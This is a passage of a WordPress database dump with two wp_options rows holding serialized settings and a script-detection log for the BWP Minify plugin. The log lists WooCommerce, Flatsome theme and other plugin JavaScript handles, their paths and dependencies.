INSERT INTO `wp_options` VALUES (607802, 'bwp_minify_general', 'a:24:{s:12:"input_minurl";s:0:"";s:13:"input_minpath";s:0:"";s:15:"input_cache_dir";s:0:"";s:14:"input_doc_root";s:0:"";s:14:"input_maxfiles";i:10;s:12:"input_maxage";i:1;s:12:"input_ignore";s:38:"admin-bar\r\njquery-core\r\njquery-migrate";s:12:"input_header";s:0:"";s:12:"input_direct";s:0:"";s:12:"input_footer";s:0:"";s:14:"input_oblivion";s:0:"";s:18:"input_style_ignore";s:20:"admin-bar\r\ndashicons";s:18:"input_style_direct";s:0:"";s:20:"input_style_oblivion";s:0:"";s:19:"input_custom_buster";s:0:"";s:13:"enable_min_js";s:3:"yes";s:14:"enable_min_css";s:3:"yes";s:15:"enable_bloginfo";s:0:"";s:22:"enable_external_origin";s:0:"";s:17:"enable_css_bubble";s:3:"yes";s:22:"enable_cache_file_lock";s:3:"yes";s:12:"enable_debug";s:0:"";s:18:"select_buster_type";s:4:"none";s:16:"select_time_type";i:86400;}', 'yes'); 
INSERT INTO `wp_options` VALUES (607803, 'bwp_minify_detector_log', 'a:3:{s:7:"scripts";a:84:{s:11:"jquery-core";a:8:{s:6:"handle";s:11:"jquery-core";s:3:"src";s:32:"/wp-includes/js/jquery/jquery.js";s:3:"min";b:0;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:17:"ignored in header";s:5:"order";i:3;s:5:"group";s:11:"jquery-core";}s:14:"jquery-migrate";a:8:{s:6:"handle";s:14:"jquery-migrate";s:3:"src";s:44:"/wp-includes/js/jquery/jquery-migrate.min.js";s:3:"min";b:0;s:2:"wp";b:0;s:6:"depend";a:1:{i:0;s:11:"jquery-core";}s:8:"position";s:17:"ignored in header";s:5:"order";i:3;s:5:"group";s:14:"jquery-migrate";}s:11:"jquery-form";a:8:{s:6:"handle";s:11:"jquery-form";s:3:"src";s:64:"wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:1:{i:0;s:6:"jquery";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:11:"jquery-form";}s:14:"contact-form-7";a:8:{s:6:"handle";s:14:"contact-form-7";s:3:"src";s:56:"wp-content/plugins/contact-form-7/includes/js/scripts.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:2:{i:0;s:6:"jquery";i:1;s:11:"jquery-form";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:11:"jquery-form";}s:8:"magnific";a:8:{s:6:"handle";s:8:"magnific";s:3:"src";s:61:"wp-content/plugins/displayProduct/plugin/magnific/magnific.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:8:"magnific";}s:12:"dp_quickview";a:8:{s:6:"handle";s:12:"dp_quickview";s:3:"src";s:68:"wp-content/plugins/displayProduct/plugin/magnific/magnific-custom.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:8:"magnific";}s:12:"zxcvbn-async";a:8:{s:6:"handle";s:12:"zxcvbn-async";s:3:"src";s:34:"wp-includes/js/zxcvbn-async.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:8:"magnific";}s:23:"password-strength-meter";a:8:{s:6:"handle";s:23:"password-strength-meter";s:3:"src";s:42:"wp-admin/js/password-strength-meter.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:2:{i:0;s:6:"jquery";i:1;s:12:"zxcvbn-async";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:11:"jquery-form";}s:26:"wc-password-strength-meter";a:8:{s:6:"handle";s:26:"wc-password-strength-meter";s:3:"src";s:80:"wp-content/plugins/woocommerce/assets/js/frontend/password-strength-meter.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:2:{i:0;s:6:"jquery";i:1;s:23:"password-strength-meter";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:11:"jquery-form";}s:7:"hm_wcps";a:8:{s:6:"handle";s:7:"hm_wcps";s:3:"src";s:79:"wp-content/plugins/password-strength-for-woocommerce/js/password-strength-wc.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:1:{i:0;s:26:"wc-password-strength-meter";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:11:"jquery-form";}s:28:"pc_google_analytics-frontend";a:8:{s:6:"handle";s:28:"pc_google_analytics-frontend";s:3:"src";s:64:"wp-content/plugins/pc-google-analytics/assets/js/frontend.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:1:{i:0;s:6:"jquery";}s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:8:"magnific";}s:14:"jquery-ui-core";a:8:{s:6:"handle";s:14:"jquery-ui-core";s:3:"src";s:36:"wp-includes/js/jquery/ui/core.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:1:{i:0;s:6:"jquery";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:11:"jquery-form";}s:23:"SFSIPLUSjqueryModernizr";a:8:{s:6:"handle";s:23:"SFSIPLUSjqueryModernizr";s:3:"src";s:80:"wp-content/plugins/ultimate-social-media-plus/js/shuffle/modernizr.custom.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:11:"jquery-form";}s:21:"SFSIPLUSjqueryShuffle";a:8:{s:6:"handle";s:21:"SFSIPLUSjqueryShuffle";s:3:"src";s:78:"wp-content/plugins/ultimate-social-media-plus/js/shuffle/jquery.shuffle.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:11:"jquery-form";}s:28:"SFSIPLUSjqueryrandom-shuffle";a:8:{s:6:"handle";s:28:"SFSIPLUSjqueryrandom-shuffle";s:3:"src";s:78:"wp-content/plugins/ultimate-social-media-plus/js/shuffle/random-shuffle-min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:11:"jquery-form";}s:16:"SFSIPLUSCustomJs";a:8:{s:6:"handle";s:16:"SFSIPLUSCustomJs";s:3:"src";s:58:"wp-content/plugins/ultimate-social-media-plus/js/custom.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:16:"SFSIPLUSCustomJs";}s:14:"wc-add-to-cart";a:8:{s:6:"handle";s:14:"wc-add-to-cart";s:3:"src";s:68:"wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:1:{i:0;s:6:"jquery";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:16:"SFSIPLUSCustomJs";}s:14:"jquery-blockui";a:8:{s:6:"handle";s:14:"jquery-blockui";s:3:"src";s:77:"wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:1:{i:0;s:6:"jquery";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:16:"SFSIPLUSCustomJs";}s:11:"woocommerce";a:8:{s:6:"handle";s:11:"woocommerce";s:3:"src";s:68:"wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:2:{i:0;s:6:"jquery";i:1;s:14:"jquery-blockui";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:16:"SFSIPLUSCustomJs";}s:13:"jquery-cookie";a:8:{s:6:"handle";s:13:"jquery-cookie";s:3:"src";s:75:"wp-content/plugins/woocommerce/assets/js/jquery-cookie/jquery.cookie.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:1:{i:0;s:6:"jquery";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:16:"SFSIPLUSCustomJs";}s:17:"wc-cart-fragments";a:8:{s:6:"handle";s:17:"wc-cart-fragments";s:3:"src";s:71:"wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:2:{i:0;s:6:"jquery";i:1;s:13:"jquery-cookie";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:16:"SFSIPLUSCustomJs";}s:17:"yith_autocomplete";a:8:{s:6:"handle";s:17:"yith_autocomplete";s:3:"src";s:82:"wp-content/plugins/yith-woocommerce-ajax-search/assets/js/yith-autocomplete.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:1:{i:0;s:6:"jquery";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:16:"SFSIPLUSCustomJs";}s:16:"jquery-selectBox";a:8:{s:6:"handle";s:16:"jquery-selectBox";s:3:"src";s:78:"wp-content/plugins/yith-woocommerce-wishlist/assets/js/jquery.selectBox.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:1:{i:0;s:6:"jquery";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:14:"wc-add-to-cart";}s:16:"jquery-yith-wcwl";a:8:{s:6:"handle";s:16:"jquery-yith-wcwl";s:3:"src";s:74:"wp-content/plugins/yith-woocommerce-wishlist/assets/js/jquery.yith-wcwl.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:2:{i:0;s:6:"jquery";i:1;s:16:"jquery-selectBox";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:14:"wc-add-to-cart";}s:29:"flatsome-woocommerce-wishlist";a:8:{s:6:"handle";s:29:"flatsome-woocommerce-wishlist";s:3:"src";s:72:"wp-content/themes/flatsome/inc/integrations/wc-yith-wishlist/wishlist.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:14:"wc-add-to-cart";}s:20:"flatsome-live-search";a:8:{s:6:"handle";s:20:"flatsome-live-search";s:3:"src";s:86:"wp-content/themes/flatsome/inc/extensions/flatsome-live-search/flatsome-live-search.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:16:"SFSIPLUSCustomJs";}s:16:"multipleSelectJs";a:8:{s:6:"handle";s:16:"multipleSelectJs";s:3:"src";s:67:"wp-content/plugins/product-enquiry-pro/js/public/multiple-select.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:1:{i:0;s:6:"jquery";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:11:"jquery-form";}s:27:"quoteup-end-approval-script";a:8:{s:6:"handle";s:27:"quoteup-end-approval-script";s:3:"src";s:78:"wp-content/plugins/product-enquiry-pro/js/public/end-approval-quote-session.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:1:{i:0;s:6:"jquery";}s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:8:"magnific";}s:16:"jquery-ui-widget";a:8:{s:6:"handle";s:16:"jquery-ui-widget";s:3:"src";s:38:"wp-includes/js/jquery/ui/widget.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:1:{i:0;s:6:"jquery";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:14:"wc-add-to-cart";}s:15:"jquery-ui-mouse";a:8:{s:6:"handle";s:15:"jquery-ui-mouse";s:3:"src";s:37:"wp-includes/js/jquery/ui/mouse.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:2:{i:0;s:14:"jquery-ui-core";i:1;s:16:"jquery-ui-widget";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:14:"wc-add-to-cart";}s:19:"jquery-ui-draggable";a:8:{s:6:"handle";s:19:"jquery-ui-draggable";s:3:"src";s:41:"wp-includes/js/jquery/ui/draggable.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:1:{i:0;s:15:"jquery-ui-mouse";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:19:"jquery-ui-draggable";}s:23:"quoteup-cart-responsive";a:8:{s:6:"handle";s:23:"quoteup-cart-responsive";s:3:"src";s:68:"wp-content/plugins/product-enquiry-pro/js/public/responsive-table.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:2:{i:0;s:6:"jquery";i:1;s:19:"jquery-ui-draggable";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:19:"jquery-ui-draggable";}s:11:"hoverIntent";a:8:{s:6:"handle";s:11:"hoverIntent";s:3:"src";s:33:"wp-includes/js/hoverIntent.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:1:{i:0;s:6:"jquery";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:16:"SFSIPLUSCustomJs";}s:11:"flatsome-js";a:8:{s:6:"handle";s:11:"flatsome-js";s:3:"src";s:48:"wp-content/themes/flatsome/assets/js/flatsome.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:2:{i:0;s:6:"jquery";i:1;s:11:"hoverIntent";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:16:"SFSIPLUSCustomJs";}s:29:"flatsome-theme-woocommerce-js";a:8:{s:6:"handle";s:29:"flatsome-theme-woocommerce-js";s:3:"src";s:51:"wp-content/themes/flatsome/assets/js/woocommerce.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:1:{i:0;s:11:"flatsome-js";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:29:"flatsome-theme-woocommerce-js";}s:8:"wp-embed";a:8:{s:6:"handle";s:8:"wp-embed";s:3:"src";s:30:"wp-includes/js/wp-embed.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:29:"flatsome-theme-woocommerce-js";}s:19:"flatsome-masonry-js";a:8:{s:6:"handle";s:19:"flatsome-masonry-js";s:3:"src";s:58:"wp-content/themes/flatsome/assets/libs/packery.pkgd.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:1:{i:0;s:6:"jquery";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:29:"flatsome-theme-woocommerce-js";}s:9:"admin-bar";a:8:{s:6:"handle";s:9:"admin-bar";s:3:"src";s:32:"/wp-includes/js/admin-bar.min.js";s:3:"min";b:0;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:17:"ignored in footer";s:5:"order";i:5;s:5:"group";s:9:"admin-bar";}s:17:"wc-single-product";a:8:{s:6:"handle";s:17:"wc-single-product";s:3:"src";s:71:"wp-content/plugins/woocommerce/assets/js/frontend/single-product.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:1:{i:0;s:6:"jquery";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:16:"SFSIPLUSCustomJs";}s:21:"yit-tabmanager-script";a:8:{s:6:"handle";s:21:"yit-tabmanager-script";s:3:"src";s:95:"wp-content/plugins/yith-woocommerce-tab-manager-premium/assets/js/frontend/tab_templates.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:1:{i:0;s:6:"jquery";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:16:"SFSIPLUSCustomJs";}s:15:"ywtm-google-map";a:8:{s:6:"handle";s:15:"ywtm-google-map";s:3:"src";s:33:"//maps.googleapis.com/maps/api/js";s:3:"min";b:0;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:17:"ignored in header";s:5:"order";i:3;s:5:"group";s:15:"ywtm-google-map";}s:17:"yit-tabmap-script";a:8:{s:6:"handle";s:17:"yit-tabmap-script";s:3:"src";s:87:"wp-content/plugins/yith-woocommerce-tab-manager-premium/assets/js/frontend/gmap3.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:2:{i:0;s:6:"jquery";i:1;s:15:"ywtm-google-map";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:16:"SFSIPLUSCustomJs";}s:14:"phone_validate";a:8:{s:6:"handle";s:14:"phone_validate";s:3:"src";s:64:"wp-content/plugins/product-enquiry-pro/js/public/phone-format.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:1:{i:0;s:6:"jquery";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:20:"flatsome-live-search";}s:32:"quoteup-jquery-mutation-observer";a:8:{s:6:"handle";s:32:"quoteup-jquery-mutation-observer";s:3:"src";s:66:"wp-content/plugins/product-enquiry-pro/js/admin/jquery-observer.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:1:{i:0;s:6:"jquery";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:20:"flatsome-live-search";}s:14:"modal_validate";a:8:{s:6:"handle";s:14:"modal_validate";s:3:"src";s:60:"wp-content/plugins/product-enquiry-pro/js/public/frontend.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:2:{i:0;s:6:"jquery";i:1;s:14:"phone_validate";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:20:"flatsome-live-search";}s:18:"jquery-maskedinput";a:8:{s:6:"handle";s:18:"jquery-maskedinput";s:3:"src";s:74:"wp-content/plugins/ninja-forms/deprecated/js/min/jquery.maskedinput.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:1:{i:0;s:6:"jquery";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:29:"flatsome-theme-woocommerce-js";}s:10:"underscore";a:8:{s:6:"handle";s:10:"underscore";s:3:"src";s:32:"wp-includes/js/underscore.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:29:"flatsome-theme-woocommerce-js";}s:8:"backbone";a:8:{s:6:"handle";s:8:"backbone";s:3:"src";s:30:"wp-includes/js/backbone.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:2:{i:0;s:10:"underscore";i:1;s:6:"jquery";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:29:"flatsome-theme-woocommerce-js";}s:19:"ninja-forms-display";a:8:{s:6:"handle";s:19:"ninja-forms-display";s:3:"src";s:75:"wp-content/plugins/ninja-forms/deprecated/js/min/ninja-forms-display.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:4:{i:0;s:6:"jquery";i:1;s:11:"jquery-form";i:2;s:8:"backbone";i:3;s:10:"underscore";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:29:"flatsome-theme-woocommerce-js";}s:7:"wp-util";a:8:{s:6:"handle";s:7:"wp-util";s:3:"src";s:29:"wp-includes/js/wp-util.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:2:{i:0;s:10:"underscore";i:1;s:6:"jquery";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:29:"flatsome-theme-woocommerce-js";}s:24:"wc-add-to-cart-variation";a:8:{s:6:"handle";s:24:"wc-add-to-cart-variation";s:3:"src";s:78:"wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart-variation.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:2:{i:0;s:6:"jquery";i:1;s:7:"wp-util";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:29:"flatsome-theme-woocommerce-js";}s:13:"ux-quick-view";a:8:{s:6:"handle";s:13:"ux-quick-view";s:3:"src";s:87:"wp-content/themes/flatsome/inc/extensions/flatsome-wc-quick-view/flatsome-quick-view.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:1:{i:0;s:11:"flatsome-js";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:29:"flatsome-theme-woocommerce-js";}s:7:"select2";a:8:{s:6:"handle";s:7:"select2";s:3:"src";s:63:"wp-content/plugins/woocommerce/assets/js/select2/select2.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:1:{i:0;s:6:"jquery";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:16:"SFSIPLUSCustomJs";}s:16:"wc-lost-password";a:8:{s:6:"handle";s:16:"wc-lost-password";s:3:"src";s:70:"wp-content/plugins/woocommerce/assets/js/frontend/lost-password.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:2:{i:0;s:6:"jquery";i:1;s:11:"woocommerce";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:16:"SFSIPLUSCustomJs";}s:18:"ux-builder-vendors";a:8:{s:6:"handle";s:18:"ux-builder-vendors";s:3:"src";s:60:"wp-content/themes/flatsome/assets/js/builder/core/vendors.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:14:"wc-add-to-cart";}s:15:"ux-builder-core";a:8:{s:6:"handle";s:15:"ux-builder-core";s:3:"src";s:60:"wp-content/themes/flatsome/assets/js/builder/core/content.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:1:{i:0;s:10:"underscore";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:14:"wc-add-to-cart";}s:19:"ux-builder-flatsome";a:8:{s:6:"handle";s:19:"ux-builder-flatsome";s:3:"src";s:62:"wp-content/themes/flatsome/assets/js/builder/custom/content.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:2:{i:0;s:11:"flatsome-js";i:1;s:19:"flatsome-masonry-js";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:11:"hoverIntent";}s:17:"wc-country-select";a:8:{s:6:"handle";s:17:"wc-country-select";s:3:"src";s:71:"wp-content/plugins/woocommerce/assets/js/frontend/country-select.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:1:{i:0;s:6:"jquery";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:16:"SFSIPLUSCustomJs";}s:15:"wc-address-i18n";a:8:{s:6:"handle";s:15:"wc-address-i18n";s:3:"src";s:69:"wp-content/plugins/woocommerce/assets/js/frontend/address-i18n.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:1:{i:0;s:6:"jquery";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:16:"SFSIPLUSCustomJs";}s:26:"dp-frontend-hoverex-all-js";a:8:{s:6:"handle";s:26:"dp-frontend-hoverex-all-js";s:3:"src";s:66:"wp-content/plugins/displayProduct/plugin/hoverex/jquery.hoverex.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:29:"flatsome-theme-woocommerce-js";}s:18:"dp-frontend-script";a:8:{s:6:"handle";s:18:"dp-frontend-script";s:3:"src";s:67:"wp-content/plugins/displayProduct/assets/js/displayProduct_front.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:29:"flatsome-theme-woocommerce-js";}s:21:"dp-frontend-variation";a:8:{s:6:"handle";s:21:"dp-frontend-variation";s:3:"src";s:65:"wp-content/plugins/displayProduct/assets/js/dp-front-variation.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:1:{i:0;s:6:"jquery";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:29:"flatsome-theme-woocommerce-js";}s:5:"json2";a:8:{s:6:"handle";s:5:"json2";s:3:"src";s:27:"wp-includes/js/json2.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:5:"json2";}s:14:"customize-base";a:8:{s:6:"handle";s:14:"customize-base";s:3:"src";s:36:"wp-includes/js/customize-base.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:3:{i:0;s:6:"jquery";i:1;s:5:"json2";i:2;s:10:"underscore";}s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:5:"json2";}s:17:"customize-preview";a:8:{s:6:"handle";s:17:"customize-preview";s:3:"src";s:39:"wp-includes/js/customize-preview.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:1:{i:0;s:14:"customize-base";}s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:5:"json2";}s:22:"kirki_auto_postmessage";a:8:{s:6:"handle";s:22:"kirki_auto_postmessage";s:3:"src";s:67:"wp-content/themes/flatsome/inc/admin/kirki/assets/js/postmessage.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:1:{i:0;s:17:"customize-preview";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:22:"kirki_auto_postmessage";}s:22:"flatsome-customizer-js";a:8:{s:6:"handle";s:22:"flatsome-customizer-js";s:3:"src";s:70:"wp-content/themes/flatsome/inc/admin/customizer/js/frontend-helpers.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:22:"kirki_auto_postmessage";}s:29:"flatsome-customizer-js-layout";a:8:{s:6:"handle";s:29:"flatsome-customizer-js-layout";s:3:"src";s:69:"wp-content/themes/flatsome/inc/admin/options/layout/options-layout.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:22:"kirki_auto_postmessage";}s:29:"flatsome-customizer-js-header";a:8:{s:6:"handle";s:29:"flatsome-customizer-js-header";s:3:"src";s:69:"wp-content/themes/flatsome/inc/admin/options/header/options-header.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:22:"kirki_auto_postmessage";}s:29:"flatsome-customizer-js-footer";a:8:{s:6:"handle";s:29:"flatsome-customizer-js-footer";s:3:"src";s:69:"wp-content/themes/flatsome/inc/admin/options/footer/options-footer.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:22:"kirki_auto_postmessage";}s:26:"flatsome-customizer-js-css";a:8:{s:6:"handle";s:26:"flatsome-customizer-js-css";s:3:"src";s:69:"wp-content/themes/flatsome/inc/admin/options/styles/options-styles.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:22:"kirki_auto_postmessage";}s:27:"flatsome-customizer-js-shop";a:8:{s:6:"handle";s:27:"flatsome-customizer-js-shop";s:3:"src";s:65:"wp-content/themes/flatsome/inc/admin/options/shop/options-shop.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:22:"kirki_auto_postmessage";}s:27:"customize-selective-refresh";a:8:{s:6:"handle";s:27:"customize-selective-refresh";s:3:"src";s:49:"wp-includes/js/customize-selective-refresh.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:3:{i:0;s:6:"jquery";i:1;s:7:"wp-util";i:2;s:17:"customize-preview";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:14:"jquery-blockui";}s:25:"customize-preview-widgets";a:8:{s:6:"handle";s:25:"customize-preview-widgets";s:3:"src";s:47:"wp-includes/js/customize-preview-widgets.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:4:{i:0;s:6:"jquery";i:1;s:7:"wp-util";i:2;s:17:"customize-preview";i:3;s:27:"customize-selective-refresh";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:25:"customize-preview-widgets";}s:27:"customize-preview-nav-menus";a:8:{s:6:"handle";s:27:"customize-preview-nav-menus";s:3:"src";s:49:"wp-includes/js/customize-preview-nav-menus.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:4:{i:0;s:6:"jquery";i:1;s:7:"wp-util";i:2;s:17:"customize-preview";i:3;s:27:"customize-selective-refresh";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:25:"customize-preview-widgets";}s:7:"wc-cart";a:8:{s:6:"handle";s:7:"wc-cart";s:3:"src";s:61:"wp-content/plugins/woocommerce/assets/js/frontend/cart.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:3:{i:0;s:6:"jquery";i:1;s:17:"wc-country-select";i:2;s:15:"wc-address-i18n";}s:8:"position";s:18:"minified in 